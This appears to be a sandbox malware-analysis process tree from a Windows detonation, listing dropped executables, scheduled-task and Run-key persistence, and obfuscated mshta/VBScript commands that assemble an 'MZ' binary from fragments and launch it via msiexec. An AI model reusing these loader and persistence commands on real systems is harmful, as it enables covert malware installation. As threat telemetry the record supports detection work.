C:\Users\Admin\Pictures\Adobe Films\Gy4Fi8em_KLp3z6GEiMCww2A.exe"C:\Users\Admin\Pictures\Adobe Films\Gy4Fi8em_KLp3z6GEiMCww2A.exe"7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST6⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST6⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Adobe Films\vZtRm6RPNwcqvnanVev4uQep.exe"C:\Users\Admin\Pictures\Adobe Films\vZtRm6RPNwcqvnanVev4uQep.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\lDYn6p91yzfKElN48ASYj3I8.exe"C:\Users\Admin\Pictures\Adobe Films\lDYn6p91yzfKElN48ASYj3I8.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\ik4j_W_ltwNfFlsIyokyL3WC.exe"C:\Users\Admin\Pictures\Adobe Films\ik4j_W_ltwNfFlsIyokyL3WC.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\lDmYLXyNa7LPLO_m9F0WRNSp.exe"C:\Users\Admin\Pictures\Adobe Films\lDmYLXyNa7LPLO_m9F0WRNSp.exe"5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri05851d7f13.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\Fri05851d7f13.exeFri05851d7f13.exe4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri0541e16ce794d258f.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\Fri0541e16ce794d258f.exeFri0541e16ce794d258f.exe4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3564 -s 2405⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri05890d11cdb13f95e.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\Fri05890d11cdb13f95e.exeFri05890d11cdb13f95e.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe"C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\4185474.exe"C:\ProgramData\4185474.exe"7⤵
-
C:\ProgramData\5388765.exe"C:\ProgramData\5388765.exe"7⤵
-
C:\ProgramData\1371155.exe"C:\ProgramData\1371155.exe"7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\8884366.exe"C:\ProgramData\8884366.exe"7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\1450546.exe"C:\ProgramData\1450546.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"6⤵
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe e58bda179b647d8612e48a6ef749c3a3 wz+93ybZOUOarTGSQyPF/Q.0.1.0.3.01⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\uus\AMD64\MoUsoCoreWorker.exeC:\Windows\uus\AMD64\MoUsoCoreWorker.exe2⤵
-
C:\Windows\uus\AMD64\MoUsoCoreWorker.exeC:\Windows\uus\AMD64\MoUsoCoreWorker.exe2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 3564 -ip 35641⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5556 -s 4563⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2292 -ip 22921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5556 -ip 55561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5536 -ip 55361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4036 -ip 40361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 5772 -ip 57721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5740 -s 2561⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 712 -p 4980 -ip 49801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\mp7Vk_cGSKQF_a2Ibkt1jyyO.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\mp7Vk_cGSKQF_a2Ibkt1jyyO.exe" ) do taskkill -im "%~NxK" -F1⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -im "mp7Vk_cGSKQF_a2Ibkt1jyyO.exe" -F2⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\8pWB.eXE8pWB.eXe /pO_wtib1KE0hzl7U9_CYP2⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F4⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ( "WSCRIPt.SheLl" ). rUn ( "C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " , 0 , TruE ) )3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "5⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\N3V4H8H.SXY5⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5772 -s 2521⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\A8E8.tmp\A8E9.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\A8E8.tmp\A8E9.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""1⤵
-
C:\Users\Admin\Pictures\Adobe Films\YwfX9VEMCM0I8tKzQEPvHqNf.exe"C:\Users\Admin\Pictures\Adobe Films\YwfX9VEMCM0I8tKzQEPvHqNf.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\is-ETBRI.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-ETBRI.tmp\DYbALA.exe" /S /UID=27101⤵
- Drops file in Drivers directory
- Adds Run key to start application
-
C:\Program Files\Windows Defender Advanced Threat Protection\AYZETYJXBB\foldershare.exe"C:\Program Files\Windows Defender Advanced Threat Protection\AYZETYJXBB\foldershare.exe" /VERYSILENT2⤵
-
C:\Users\Admin\AppData\Local\Temp\6e-43af4-f22-cbebd-84168f7b4ff61\Kakadaemaezhy.exe"C:\Users\Admin\AppData\Local\Temp\6e-43af4-f22-cbebd-84168f7b4ff61\Kakadaemaezhy.exe"2⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e63⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0x100,0x110,0x7ffcd08e46f8,0x7ffcd08e4708,0x7ffcd08e47184⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,1244753638332105109,11099420881660720801,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2092 /prefetch:24⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2064,1244753638332105109,11099420881660720801,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 /prefetch:34⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2064,1244753638332105109,11099420881660720801,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2708 /prefetch:84⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,1244753638332105109,11099420881660720801,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3588 /prefetch:14⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,1244753638332105109,11099420881660720801,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3608 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2064,1244753638332105109,11099420881660720801,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5536 /prefetch:84⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2064,1244753638332105109,11099420881660720801,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5536 /prefetch:84⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,1244753638332105109,11099420881660720801,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5636 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,1244753638332105109,11099420881660720801,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5904 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,1244753638332105109,11099420881660720801,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5760 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,1244753638332105109,11099420881660720801,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5264 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,1244753638332105109,11099420881660720801,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5888 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,1244753638332105109,11099420881660720801,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5180 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,1244753638332105109,11099420881660720801,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3068 /prefetch:24⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,1244753638332105109,11099420881660720801,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5496 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,1244753638332105109,11099420881660720801,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3096 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,1244753638332105109,11099420881660720801,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1512 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,1244753638332105109,11099420881660720801,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5880 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,1244753638332105109,11099420881660720801,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4224 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,1244753638332105109,11099420881660720801,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2020 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,1244753638332105109,11099420881660720801,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1872 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,1244753638332105109,11099420881660720801,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1240 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,1244753638332105109,11099420881660720801,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6300 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,1244753638332105109,11099420881660720801,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6492 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,1244753638332105109,11099420881660720801,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5848 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad3⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcd08e46f8,0x7ffcd08e4708,0x7ffcd08e47184⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18514833⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcd08e46f8,0x7ffcd08e4708,0x7ffcd08e47184⤵
-
C:\Users\Admin\AppData\Local\Temp\1b-051a9-cbb-75aa8-9f5e64719a71b\Waetojunete.exe"C:\Users\Admin\AppData\Local\Temp\1b-051a9-cbb-75aa8-9f5e64719a71b\Waetojunete.exe"2⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nxz1glzr.obg\GcleanerEU.exe /eufive & exit3⤵
-
C:\Users\Admin\AppData\Local\Temp\nxz1glzr.obg\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\nxz1glzr.obg\GcleanerEU.exe /eufive4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2012 -s 2525⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jk314gut.xe1\installer.exe /qn CAMPAIGN="654" & exit3⤵
-
C:\Users\Admin\AppData\Local\Temp\jk314gut.xe1\installer.exeC:\Users\Admin\AppData\Local\Temp\jk314gut.xe1\installer.exe /qn CAMPAIGN="654"4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ubao0ehu.see\any.exe & exit3⤵
-
C:\Users\Admin\AppData\Local\Temp\ubao0ehu.see\any.exeC:\Users\Admin\AppData\Local\Temp\ubao0ehu.see\any.exe4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fjkai03g.v1v\gcleaner.exe /mixfive & exit3⤵
-
C:\Users\Admin\AppData\Local\Temp\fjkai03g.v1v\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\fjkai03g.v1v\gcleaner.exe /mixfive4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8828 -s 2565⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\phgion4f.vjv\autosubplayer.exe /S & exit3⤵
-
C:\Users\Admin\AppData\Local\Temp\phgion4f.vjv\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\phgion4f.vjv\autosubplayer.exe /S4⤵
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw59B8.tmp\tempfile.ps1"5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw59B8.tmp\tempfile.ps1"5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw59B8.tmp\tempfile.ps1"5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw59B8.tmp\tempfile.ps1"5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw59B8.tmp\tempfile.ps1"5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw59B8.tmp\tempfile.ps1"5⤵
-
